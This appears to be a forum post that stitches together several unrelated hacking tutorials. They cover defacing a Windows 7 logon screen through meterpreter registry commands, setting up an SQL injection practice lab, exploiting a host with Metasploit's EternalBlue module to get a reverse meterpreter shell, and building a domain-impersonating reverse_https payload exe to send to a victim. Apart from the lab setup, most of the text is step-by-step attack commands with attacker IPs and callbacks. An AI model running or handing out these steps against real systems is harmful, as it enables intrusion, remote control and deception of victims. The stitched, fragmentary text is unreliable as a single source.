05-02-2020, 11:49 AM
| 0 | 0 | ||
Through this article, we are showing how an attacker sends threaten message on logon screen to the targeted users.
Let’s start
Attacker: Kali Linux
Target: window 7
Read our previous article how to hack windows 7 and get a meterpreter session of victims, inside meterpreter, there are so many options for post exploit now type the following command to move inside registry key of the victim’s system
reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System
1
reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System
From the screenshot, you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.
- legalnoticecaption
- legalnoticetext
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-wEM1Ov326sE/WSmvEHvqyjI/AAAAAAAAQEg/fgEMNgsXQw8gCOSpfwHG6CbW0z-3clrBACLcB/s1600/1.png?w=687&ssl=1)
Now type another command for assigning the value of legalnoticecaption which is used for providing the title or heading of the given message on logon screen.
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"
1
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"
From the screenshot you can read our registry key is successfully set.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-vVYyNZrERYY/WSmvDtg7BfI/AAAAAAAAQEY/vK2x9hodceMWzBTwEL4zHTsxEyM6csqagCEw/s1600/2.png?w=687&ssl=1)
Now type one more command for giving a warning message to the targeted system by assigning the value of legalnoticetext which will display your message on logon screen of victim’s system.
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"
1
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"
From the screenshot you can read again our registry key is successfully set.
Here –k denote key; -V denote value; -d denote input data.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-p1dX42wfstM/WSmvDrKtmEI/AAAAAAAAQEc/_xmxyMqAUy00Wo3vguMSJEFuTJ4B_YZkACEw/s1600/3.png?w=687&ssl=1)
Now when the victim will start his system after then he will receive our message on logon screen as shown in the given screenshot.
Try it yourself!!!
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-PSO9J9ct9pc/WSmvEyrHaLI/AAAAAAAAQEk/gs3UdF2-s0UBiQHkKYFfb-S7dhKLKh4VACEw/s1600/4.png?w=687&ssl=1)
Hello everyone, today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practising and understanding SQL INJECTION) in our latest Ubuntu Machine.
A laboratory that offers a complete test environment for those interested in acquiring or improving SQL injection skills. Let’s start. First, we will download SQLI lab inside html directory by the following link-
git clone
[To see content please register here]
1
git clone
[To see content please register here]
Once the download is done, we will move sqli labs into the /var/www/html directory and rename it to sqli. Then go inside the sqli directory where we will find /sqli-connections directory. Here we will run ls command to check the files and we can see that here is a file by the name of db-creds.inc
we need to make some changes in the config file by the following command-
cd Sqli_Edited_Version/
ls
mv sqlilabs/ ../sqli
cd sqli
cd sql-connections/
ls
nano db-creds.inc
1
2
3
4
5
6
7
cd Sqli_Edited_Version/
ls
mv sqlilabs/ ../sqli
cd sqli
cd sql-connections/
ls
nano db-creds.inc
![[Image: 22.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-yxQJmIbVaqk/XNBYVDP1xeI/AAAAAAAAeQw/xvP4wn2bDkQpqQAh6gH8hTIPkLOFrqXvgCLcBGAs/s1600/22.png?w=687)
As we can see that username is given root and password is left blank which we need to modify.
![[Image: 23.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-z6E-BER6UZI/XNBYVYLR8SI/AAAAAAAAeQ0/rimXANeL5F0E_5naNkpH-cA44KD7Oux7QCLcBGAs/s1600/23.png?w=687)
Now here we will set the username and password as raj:123 Now save the file and exit.
![[Image: 24..png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-fQ2pqT27zr4/XNBYVp-ILpI/AAAAAAAAeQ4/QhEZkl0GUi0LmRBrS7k5PJG2VRwJImGvQCLcBGAs/s1600/24..png?w=687)
Now browse this web application from through this URL: localhost/sqli and click on Setup/reset Databases for labs.
![[Image: 25.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-qwZ34kkCbD8/XNBYVudQE3I/AAAAAAAAeQ8/L60e0iXQdBYHWtFuhqsIcInySw3ofjvGACLcBGAs/s1600/25.png?w=687)
Now the sqli lab is ready to use.
![[Image: 26.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-sW2mJaT06Bw/XNBYWBcn3mI/AAAAAAAAeRA/9WbM1qd-hdI_jK-cy8Smoirpc15YhEuZgCLcBGAs/s1600/26.png?w=687)
Now a page will open up in your browser which is an indication that we can access different kinds of Sqli challenges
![[Image: 27.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-403T-oGpSw4/XNBYWuzVZFI/AAAAAAAAeRI/kP6OltomyacVyI4Lggmn-Zte8BfG5DFlwCLcBGAs/s1600/27.png?w=687)
Click on lesson 1 and start the Sqli challenge.
![[Image: 28.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-llJnOGNDPgY/XNBYWW5_K2I/AAAAAAAAeRE/B7svXkR0Q94YCMbEFINfkU-A6rwsErFmACLcBGAs/s1600/28.png?w=687)
This module is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.
Let’s start!!!
Attacker: Kali Linux
Target: Window 7
Open the terminal in your Kali Linux type msfconsole to load Metasploit framework.
msfconsole
1
msfconsole
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-6Juib7HFpqU/WSQlaI4r55I/AAAAAAAAQC0/saBl3C4NQ_0iGmOT2ZPqMddNRel1B5b6QCLcB/s1600/1.png?w=687&ssl=1)
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
1
2
3
4
5
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
From the screenshot, you can see we have got a meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.
meterpreter> sysinfo
1
meterpreter> sysinfo
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-nS0Zj8rB9UE/WSQlbBQuDrI/AAAAAAAAQC4/Jo24dMWfSgsw3RU41jehgfzvnXg-hi1uwCEw/s1600/2.png?w=687&ssl=1)
Through this article, you can learn how an attacker would able to generate an SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with the host through the meterpreter session.
The firewall spoof the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the client and the server. When the client begins with an SSL session with the server, the firewall captures the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forward the certificate to the client to authenticate.
Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.
Open the terminal in your Kali Linux and type following to download it.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-4yTOrRiVEVU/WR_GslBBg2I/AAAAAAAAQA4/m-57V7W4-okcQnK7pDaQqjdGLAefKrLLQCLcB/s1600/1.png?w=687&ssl=1)
Once it downloaded run the program file and follow the given below steps.
Press Enter to continue
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ENn3ybkWcVw/WR_GtjOPrQI/AAAAAAAAQBA/mSec65tJnLAbQASHfJf4GvWVjafZ5EQKQCEw/s1600/2.png?w=687&ssl=1)
A prompt will open in which you have to choose the option for building certificate from the given screenshot you can read I had chosen to impersonate domain.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-tH3qbHeoiiw/WR_Gtgc5vaI/AAAAAAAAQBE/uypLiisBwU8-nzvmTiFrnEACqQWrRTvhwCEw/s1600/3.png?w=687&ssl=1)
We start by generating a certificate in PEM format, once the certs have been created we can create an HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.
After that again another prompt will open in which you would be asked to mention the domain name, here the SSL certificate will generate for
[To see content please register here]
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-siEXzO_b1Ao/WR_GuUtWw_I/AAAAAAAAQBI/b3USxrXfYUoE4FSB1lvW9i5KNC2KECExQCEw/s1600/4.png?w=687&ssl=1)
To have the connection validated we need to tell the payload what certificate the handler will be used by setting the path to the PEM certificate in the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.
PEM is a widely used encoding format for security certificates. Syntax and content are defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.
In the next prompt choose payload category for auto-building payload, from the given list I chose stagless (payload.exe)
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DeeaoEdboGs/WR_Gvuz52cI/AAAAAAAAQBM/RwB951FoivgxvkJUQwJspSUgRB6BoK15wCEw/s1600/5.png?w=687&ssl=1)
Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.
We can see the stage doing the validation when we recite a session back.
Enter LHOST 192.168.0.108 (attacker’s IP)
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-kb48h98dc9A/WR_GwZsZ3sI/AAAAAAAAQBQ/ZNgxJffyJ0YSI_-6l6JcdtuZ1_I3iSlvACEw/s1600/6.png?w=687&ssl=1)
Similarly given any random port for a reverse connection from the host system and click on ok.
Enter lport 8888
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KH86JoulDsk/WR_Gw8ZxF-I/AAAAAAAAQBU/QuOY718Dy0UB3OFOvjj1BY209W6-pYwZACEw/s1600/7.png?w=687&ssl=1)
Again the list of payload will open from that prompt choose desire payload which will generate payload for the attack.
windows/meterpreter_reverse_https
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-iEaaajue4cg/WR_Gx9c04QI/AAAAAAAAQBg/bl2U8uhT230jybAwj9f6O3z5spiej5ApACEw/s1600/8.png?w=687&ssl=1)
This will configure all setting and start multi handler by lunching Metasploit framework
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-FNtqxoYNcns/WR_Gxg9wkTI/AAAAAAAAQBg/SQdpKVbpxcEFPrA_jH8q5a2kvORz84s2gCEw/s1600/9.png?w=687&ssl=1)
When you move inside output folder here you will get two files; first for exe payload another for .pem certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through meterpreter.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-mrvKgOOevGY/WR_GsEeiAOI/AAAAAAAAQBg/MybaJ7yIKE4I_Dh17NqzkPWbmEoIxaz-ACEw/s1600/10.png?w=687&ssl=1)
On another hand you can compare .pem certificate from other original certificate signed by CA, if you will observe given below image you can read certification details for hackingarticles.in which as similar as CA-signed certificates.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Mlrh4S1-45U/WR_Gsa1B3eI/AAAAAAAAQBg/zxJHKbETQBUiJe6qJF__GHEmfJm71Io3gCEw/s1600/11.png?w=687&ssl=1)
Hence you can see I have successfully established the meterpreter session with the victim’s system.
Try it by yourself!!!
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-duVHgbH01nY/WR_Gs-R6ijI/AAAAAAAAQBg/5M27D0mphh8yWWJjR0lguE1r1gxbQv6AgCEw/s1600/12.png?w=687&ssl=1)
